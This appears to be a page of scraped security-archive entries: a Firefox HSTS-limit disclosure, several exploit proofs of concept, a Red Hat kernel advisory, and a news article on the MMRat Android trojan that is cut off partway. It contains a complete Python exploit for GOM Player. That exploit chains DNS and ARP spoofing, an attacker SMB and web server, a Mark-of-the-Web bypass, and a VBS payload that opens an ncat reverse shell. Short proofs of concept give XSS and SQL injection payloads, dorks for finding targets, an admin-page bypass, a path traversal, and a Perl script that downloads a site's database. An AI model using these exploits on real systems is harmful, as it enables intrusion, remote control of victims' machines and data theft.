Mozilla Firefox only stores up to 1024 HSTS entries. When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.

    # VULNERABILITYMozilla Firefox only stores up to 1024 HSTS entries.When the limit is reached, Firefox discards entries based on their age and recent visits to the domain in question.# IMPACTThe HSTS header ensures that once a page has been visited, the browser will attempt to connect to it using HTTPS.The limit means that Firefox effectively does not store any further HSTS headers, as new ones permanently override each other.Sites without HSTS protection are vulnerable to machine-in-the-middle attacks, especially downgrade attacks such as SSL Stripping.# MORETo find out if you are affected, check the number of HSTS entries:* Linux: `wc -l ~/.mozilla/firefox/{profile}/SiteSecurityServiceState.txt`* Windows: `find /c /v " " ".\AppData\Roaming\Mozilla\Firefox\Profiles\{profile}\SiteSecurityServiceState.txt"`This behavior was first reported by Sheila Ayelen Berta and Sergio De Los Santos at Black Hat Europe 2017.I filed a bug report in February 2023 that is currently being worked on.# REFERENCES* Bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=1818984* Mastodon thread: https://infosec.exchange/@kpwn/110010433703922665* Blog post: https://kpwn.de/2023/03/http-strict-transport-security/#1-the-limited-number-of-hsts-entries* Black Hat Europe 2017: Breaking Out HSTS (and HPKP) On Firefox, IE/Edge and (Possibly) Chrome   * Slides: https://www.blackhat.com/docs/eu-17/materials/eu-17-Berta-Breaking-Out-HSTS-And-HPKP-On-Firefox-IE-Edge-And-Possibly-Chrome.pdf   * Talk: https://www.youtube.com/watch?v=dPnU9_pXJ5k

Mozilla Firefox HSTS Enty Limit

GOM Player version 2.3.90.5360 man-in-the-middle proof of concept remote code execution exploit.

    # Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)# Date: 26.08.2023# Author: M. Akil Gündoğan# Contact: https://twitter.com/akilgundogan# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE# Version: 2.3.90.5360 # Tested on: Windows 10 Pro x64 22H2 19045.3324# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.# Vulnerability Description: # The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the # SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window. # Full disclosure, developers should be more careful about software security.# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.# Some spaghetti and a bad code but it works :)banner = """\033[38;5;196m+-----------------------------------------------------------+|     GOM Player 2.3.90.5360 - Remote Code Execution        ||   Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-)  |+-----------------------------------------------------------+\033[0m""" +""" \033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""import time,os,zipfile,subprocess,socket,sysprint(banner)if os.geteuid() != 0:    print("You need root privileges to run the exploit, please use sudo...")    sys.exit(1)targetIP = input("- Target IP address: ")listenPort = input("- Listening port for Reverse Shell: ")def fCreate(fileName,fileContent): # File create func.     f = open(fileName,"w")    f.write(fileContent)    f.close()    gw = os.popen("ip -4 route show default").read().split()s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)s.connect((gw[2], 0))ipaddr = s.getsockname()[0]gateway = gw[2]host = socket.gethostname()print ("- My IP:", ipaddr, " Gateway:", gateway, " Host:", host) print("\n[*]- Stage 1: Downloading neccesary tools...")smbFolderName = "GomUpdater" # change this (optional)expWorkDir = "gomExploitDir" # change this (optional)os.system("mkdir " + expWorkDir +" >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "&& mkdir smb-shared web-shared >/dev/null 2>&1 &") # Creating a working directory for the exploit.time.sleep(1) # It's necessary for exploit stability. os.system("cd " + expWorkDir + "/smb-shared && wget https://nmap.org/dist/ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && unzip -o -j ncat-portable-5.59BETA1.zip >/dev/null 2>&1 && rm -rf ncat-portable-5.59BETA1.zip README") #Downloading ncatprint("    [*] - Ncat has been downloaded.")subprocess.run("git clone https://github.com/fortra/impacket.git " + expWorkDir + "/impacket >/dev/null 2>&1",shell=True) # Downloading Impacketprint("    [*] - Impacket has been downloaded.")subprocess.run("git clone https://github.com/dtrecherel/DNSSpoof.git " + expWorkDir + "/dnsspoof >/dev/null 2>&1",shell=True) # Downloading DNSSpoof.pyprint("    [*] - DNSSpoof.py has been downloaded.")print("[*]- Stage 2: Creating Attacker SMB Server...")subprocess.Popen("cd " + expWorkDir + /impacket/examples && python3 smbserver.py "+smbFolderName+" ../../smb-shared -smb2support >/dev/null 2>&1",shell=True) # Running SMB server.time.sleep(5) # It's necessary for exploit stability. smbIP = ipaddrspoofUrl = "playinfo.gomlab.com" # Web page that causes vulnerability because it is used as HTTPprint("[*]- Stage 3: Creating Attacker Web Page...")# change this (optional) screenExpPage = """<meta charset="utf-8"><script> window.alert("GOM Player için acil güncelleme yapılmalı ! Açılan pencerede lütfen updater'a tıklayın.");</script> <script>window.location.href= 'search-ms:displayname=GOM Player Updater&crumb=System.Generic.String%3AUpdater&crumb=location:%5C%5C"""+smbIP+"""';</script>"""fCreate(expWorkDir + "/web-shared/screen.html",screenExpPage)time.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 4: Creating URL+VBS for MoTW bypass placing it into the ZIP archive...")vbsCommand = '''Set shell=CreateObject("wscript.shell") Shell.Run("xcopy /y \\\\yogurt\\ayran\\ncat.exe %temp%")WScript.Sleep 5000Shell.Run("cmd /c start /min cmd /c %temp%\\ncat.exe attackerIP attackerPort -e cmd")''' # change this (optional)vbsCommand = vbsCommand.replace("yogurt", smbIP).replace("ayran", smbFolderName).replace("attackerIP",smbIP).replace("attackerPort",listenPort)fCreate(expWorkDir + "/payload.vbs",vbsCommand)urlShortcut = '''[InternetShortcut]URL=file://'''+smbIP+"/"+smbFolderName+'''/archive.zip/payload.vbsIDlist='''fCreate(expWorkDir + "/smb-shared/Updater.url",urlShortcut)time.sleep(3) # It's necessary for exploit stability. zipName = expWorkDir + "/smb-shared/archive.zip"payload_filename = os.path.join(expWorkDir, "payload.vbs")  with zipfile.ZipFile(zipName, "w") as malzip:    malzip.write(payload_filename, arcname=os.path.basename(payload_filename))print("[*]- Stage 5: Running the attacker's web server...")subprocess.Popen("cd " + expWorkDir + "/web-shared && python3 -m http.server 80 >/dev/null 2>&1",shell=True) # Running attacker web server with Python mini http.servertime.sleep(3) # It's necessary for exploit stability. print("[*]- Stage 6: Performing DNS and ARP spoofing for the target...")subprocess.Popen("python3 " + expWorkDir + "/dnsspoof/dnsspoof.py -d " + spoofUrl + " -t " + targetIP + ">/dev/null 2>&1",shell=True) # DNS Spoofing...time.sleep(10) # It's neccesary for exploit stability.os.system("ping -c 5 " + targetIP + " >/dev/null 2>&1 &") # Ping the target... os.system("arping -c 5 " + targetIP + " >/dev/null 2>&1 &") # ARPing the target.print("[*]- Stage 7: Waiting for the target to open GOM Player and execute the malicious URL shortcut...\n")subprocess.run("nc -lvnp " + listenPort,shell=True)subprocess.run("pkill -f smbserver.py & pkill -f http.server & pkill -f dnsspoof.py",shell=True) # Closing background processes after exploitation...

GOM Player 2.3.90.5360 MITM / Remote Code Execution

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

**ImgHosting 1.2 Cross Site Scripting**

Posted Aug 29, 2023

Authored by indoushka

ImgHosting version 1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3e0de4ff80dc516a1abe50185e5807a1e503d782b2cd24457e01031368191dc0

Download | Favorite | View

**ImgHosting 1.2 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ImgHosting v1.2 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://codecanyon.net/user/FoxSash/?ref=FoxSash                                                                   |  | # Dork      : "ImgHosting  Programming by FoxSash"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : ?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/pikhostinom/?search=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,046)
*   Arbitrary (16,219)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,283)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,460)
*   Encryption (2,370)
*   Exploit (52,001)
*   File Inclusion (4,225)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,788)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,694)
*   Local (14,460)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,339)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,816)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,891)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,394)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (666)
*   Vulnerability (31,796)
*   Web (9,671)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,973)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,822)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,543)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,777)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,844)
*   UNIX (9,301)
*   UnixWare (186)
*   Windows (6,579)
*   Other

ImgHosting 1.2 Cross Site Scripting

imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

i-Gallery version 3.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : i-Gallery v3.4 Database Disclosure Exploit                                                                         |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : http://wmscripti.com/asp-scriptler/igallery-image-resim-galerisi-scripti.html                                      |    
====================================================================================================================================

poc :

[-] Download the database: 

    The following Perl exploit will attempt to download the (igallery.mdb ) file  
    The (igallery.mdb) It is the database and contains all the data .

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
#  
# i-Gallery v3.4 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : ToastForums.com

   use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print ('i-Gallery v3.4 Database Disclosure Exploit');  
system('color a');

if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="database/igallery.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/igallery.mdb");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/igallery.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
=======================================================================================================================================

i-Gallery 3.4 Database Disclosure

iBilling CRM version 4.5.0 suffers from add administrator and insecure direct object reference vulnerabilities.

    ====================================================================================================================================| # Title     : iBilling CRM v4.5.0 Add Admin vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/ibilling-crm-accounting-and-billing-software/11021678                                  || # Dork      : "Login - iBilling"                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] suffers from an insecure direct object reference that allows users to access the administrative interface.[+] choose a target and add "sysfrm/install/profile.php"[+] http://127.0.0.1/wintechsolutionsin/ibilling/sysfrm/install/profile.php[+] http://127.0.0.1/demotryibcom/dashboard/sysfrm/install/profile.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

iBilling CRM 4.5.0 Add Administrator / Insecure Direct Object Reference

Humhub version 1.3.13 suffers from a directory traversal vulnerability.

    ====================================================================================================================================| # Title     : Humhub v1.3.13 Directory traversal Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 67.0(32-bit)                                               | | # Vendor    : https://www.humhub.org/en/download/package/humhub-1.3.13.zip                                                       |  | # Dork      : "Propulsé par HumHub"                                                                                              |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /static/assets/d1081741/fonts/../Gemfile[+] https://127.0.0.1/humhubcom/static/assets/d1081741/fonts/../GemfileGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Humhub 1.3.13 Directory Traversal

Red Hat Security Advisory 2023-4815-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include out of bounds access and out of bounds write vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:4815-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4815  
Issue date:        2023-08-29  
CVE Names:         CVE-2023-2124 CVE-2023-3090 CVE-2023-35788   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2) - noarch, x86_64  
Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS TUS (v. 8.2) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: ipvlan: out-of-bounds write caused by unclear skb->cb  
(CVE-2023-3090)

* kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
(CVE-2023-35788)

* kernel: OOB access in the Linux kernel's XFS subsystem (CVE-2023-2124)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Windows Server 2019 guest randomly pauses with "KVM: entry failed,  
hardware error 0x80000021", RHEL 8.8GA (BZ#2211657)

* rbd: avoid fast-diff corruption in snapshot-based mirroring, RHEL 8.9  
(BZ#2216772)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2187439 - CVE-2023-2124 kernel: OOB access in the Linux kernel's XFS subsystem  
2215768 - CVE-2023-35788 kernel: cls_flower: out-of-bounds write in fl_set_geneve_opt()  
2218672 - CVE-2023-3090 kernel: ipvlan: out-of-bounds write caused by unclear skb->cb

6. Package List:

Red Hat Enterprise Linux BaseOS AUS (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

ppc64le:  
bpftool-4.18.0-193.113.1.el8_2.ppc64le.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-core-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.ppc64le.rpm  
perf-4.18.0-193.113.1.el8_2.ppc64le.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm  
python3-perf-4.18.0-193.113.1.el8_2.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.ppc64le.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

Red Hat Enterprise Linux BaseOS TUS (v. 8.2):

Source:  
kernel-4.18.0-193.113.1.el8_2.src.rpm

noarch:  
kernel-abi-whitelists-4.18.0-193.113.1.el8_2.noarch.rpm  
kernel-doc-4.18.0-193.113.1.el8_2.noarch.rpm

x86_64:  
bpftool-4.18.0-193.113.1.el8_2.x86_64.rpm  
bpftool-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-cross-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-core-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-devel-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-headers-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-modules-extra-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
kernel-tools-libs-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-4.18.0-193.113.1.el8_2.x86_64.rpm  
python3-perf-debuginfo-4.18.0-193.113.1.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-2124  
https://access.redhat.com/security/cve/CVE-2023-3090  
https://access.redhat.com/security/cve/CVE-2023-35788  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk7gWOAAoJENzjgjWX9erEBFgP/1rlGhyS53mT0/iU1JkXZgOW  
D8FbyJ/0cjdc03f1xWPPwlg1/n4BsdQwpYiuxKjxj1DbhyoYfBUkQa61vHdONX5V  
o6zotd6o6JeO5R4LpEom91sPZKkESyzcaTPiONgeRUOnI0USQS3+NabqOKYU/52V  
RmsEe+bj8BLv+OhAhJTe5Cwb0d8GwEbN5cuDY0DA78HImFUPFBLfhgdXAlotf2yf  
+E9+kbepUCzNQS0kR53Gu/S4rqWD93oXNnQBmURLW+ol34rjps9Cr+de2kYwg4Ka  
g0Nm2wuiXL6O2ny5oKFRwJmtUiEW8Ms3kvMyv/w6KkiXmFLmDBU/6rt1DOWzPhoE  
DT+s6BL+PKUbgLF5Nb/VA0/cSKRePFZa5WTwXYULK1i/ti6yJ66Sz2wN3SPFIAE0  
n4ftPIxlAsykr2tccHfibbP2pELvIEDmlWYJHDrZInX/5hwff48elYbEXqqYcZfH  
EZ8gHwtz277eaj2miHGh7nD1IJ6jkGdMZrydi4brRnTFm47bA90EymwDjPkr6qVN  
w3jhFXr88GPyVQlNOb+CMMQpUkkeOaRa4GkCmetvHVjo5k3J7vrZGSNQlVyOfCCA  
PcI6gSfLtUkvMhUDdNlYQRFuAT+2QWJWd2/mdYWo1vSdecaO2LcFZjYR1NiDu8o+  
0Qr3PyX3OVG1CZO65ZIk  
=nbVf  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4815-01

By Deeba Ahmed
So far, the potent Android trojan MMRat has remained undetected on VirusTotal.
This is a post from HackRead.com Read the original post: New MMRat Android Trojan Uses Fake App Stores for Bank Fraud

*   **MMRat is a new Android banking trojan targeting Southeast Asian users.**

*   **It is distributed through phishing websites disguised as official app stores.**

*   **It uses a customized Protobuf-based C2 protocol to improve its performance.**

*   **It captures screenshots, controls devices, collects extensive device, personal data.**

*   **Users can protect themselves from MMRat by downloading apps from trusted sources and avoiding suspicious websites.**

Cybersecurity researchers at Trend Micro Mobile Application Reputation Service (MARS) have discovered a stealthy new Android trojan targeting Southeast Asian mobile phone users since late June 2023.

This Android banking trojan, dubbed MMRat due to its distinctive package called com.mm.user, features a long list of capabilities as it can capture screenshots, remotely control victims’ devices, monitor user input, and perform many other tasks apart from bank fraud while staying undetected.

MARS researchers wrote in a blog post published on August 29, 2023, that the malware remained undetected on VirusTotal.

**How is MMRat Distributed?**

Most MMRat samples were downloaded from phishing websites disguised as official app stores in different languages to expand their reach. It is worth noting that researchers couldn’t determine how victims were lured into visiting these fake app stores.

This “potent” malware has been declared a “considerable threat” to mobile phone users. It uses a specially designed, fully customized Protobuf-based C2 protocol, a rare feature in Android banking trojans. This feature improves the malware’s performance while transferring large data volumes.

**Attack Sequence**

MMRat’s primary focus is on conducting bank fraud. The attack relies on the victim downloading and installing the malware on their device and granting it the required permissions. Once done, the malware quickly establishes communication with its remote server, sending copious amounts of data, including personal and mobile data, keylogging data, device status, etc.

Moreover, the malware operator can remotely turn on the device when not in use, unlock the screen, and carry out bank fraud. They may also capture screens for server-size visualization. After performing its malicious tasks, MMRat can self-uninstall and remove every trace of the manipulation.

Attack Sequence (Trend Micro)

**MMRat Capabilities**

As mentioned above, MMRat is a highly capable malware that can capture user input/screen content and allow remote control of the device. Relying on the Android Accessibility service and MediaProjection API for its functioning, the malware can easily detect when the device is on or off and reboot it by registering a receiver on the system.

Furthermore, the trojan avoids suspicion by disguising itself as an official government or dating app and enters the victim’s device through a phishing website. It also launches a 1×1-sized pixel activity to stay persistent.

**What Data Does it Collect?**

